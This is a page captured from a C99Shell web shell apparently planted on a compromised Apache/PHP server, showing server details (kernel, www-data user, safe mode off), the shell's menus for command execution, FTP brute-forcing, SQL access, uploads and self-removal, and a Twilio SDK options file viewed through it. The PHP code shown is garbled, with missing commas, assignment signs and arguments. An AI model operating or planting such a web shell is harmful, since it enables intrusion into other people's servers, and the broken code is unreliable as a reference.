!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/twilio/sdk/src/Twilio/Rest/Preview/Sync/Service/SyncMap/   drwxr-xr-x
Free 13.17 GB of 57.97 GB (22.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SyncMapItemOptions.php (4.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Preview\Sync\Service\SyncMap;

use 
Twilio\Options;
use 
Twilio\Values;

/**
 * PLEASE NOTE that this class contains preview products that are subject to change. Use them with caution. If you currently do not have developer preview access, please contact help@twilio.com.
 */
abstract class SyncMapItemOptions {
    
/**
     * @param string $ifMatch The If-Match HTTP request header
     * @return DeleteSyncMapItemOptions Options builder
     */
    
public static function delete(string $ifMatch Values::NONE): DeleteSyncMapItemOptions {
        return new 
DeleteSyncMapItemOptions($ifMatch);
    }

    
/**
     * @param string $order The order
     * @param string $from The from
     * @param string $bounds The bounds
     * @return ReadSyncMapItemOptions Options builder
     */
    
public static function read(string $order Values::NONEstring $from Values::NONEstring $bounds Values::NONE): ReadSyncMapItemOptions {
        return new 
ReadSyncMapItemOptions($order$from$bounds);
    }

    
/**
     * @param string $ifMatch The If-Match HTTP request header
     * @return UpdateSyncMapItemOptions Options builder
     */
    
public static function update(string $ifMatch Values::NONE): UpdateSyncMapItemOptions {
        return new 
UpdateSyncMapItemOptions($ifMatch);
    }
}

class 
DeleteSyncMapItemOptions extends Options {
    
/**
     * @param string $ifMatch The If-Match HTTP request header
     */
    
public function __construct(string $ifMatch Values::NONE) {
        
$this->options['ifMatch'] = $ifMatch;
    }

    
/**
     * The If-Match HTTP request header
     *
     * @param string $ifMatch The If-Match HTTP request header
     * @return $this Fluent Builder
     */
    
public function setIfMatch(string $ifMatch): self {
        
$this->options['ifMatch'] = $ifMatch;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Preview.Sync.DeleteSyncMapItemOptions ' $options ']';
    }
}

class 
ReadSyncMapItemOptions extends Options {
    
/**
     * @param string $order The order
     * @param string $from The from
     * @param string $bounds The bounds
     */
    
public function __construct(string $order Values::NONEstring $from Values::NONEstring $bounds Values::NONE) {
        
$this->options['order'] = $order;
        
$this->options['from'] = $from;
        
$this->options['bounds'] = $bounds;
    }

    
/**
     * The order
     *
     * @param string $order The order
     * @return $this Fluent Builder
     */
    
public function setOrder(string $order): self {
        
$this->options['order'] = $order;
        return 
$this;
    }

    
/**
     * The from
     *
     * @param string $from The from
     * @return $this Fluent Builder
     */
    
public function setFrom(string $from): self {
        
$this->options['from'] = $from;
        return 
$this;
    }

    
/**
     * The bounds
     *
     * @param string $bounds The bounds
     * @return $this Fluent Builder
     */
    
public function setBounds(string $bounds): self {
        
$this->options['bounds'] = $bounds;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Preview.Sync.ReadSyncMapItemOptions ' $options ']';
    }
}

class 
UpdateSyncMapItemOptions extends Options {
    
/**
     * @param string $ifMatch The If-Match HTTP request header
     */
    
public function __construct(string $ifMatch Values::NONE) {
        
$this->options['ifMatch'] = $ifMatch;
    }

    
/**
     * The If-Match HTTP request header
     *
     * @param string $ifMatch The If-Match HTTP request header
     * @return $this Fluent Builder
     */
    
public function setIfMatch(string $ifMatch): self {
        
$this->options['ifMatch'] = $ifMatch;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Preview.Sync.UpdateSyncMapItemOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0064 ]--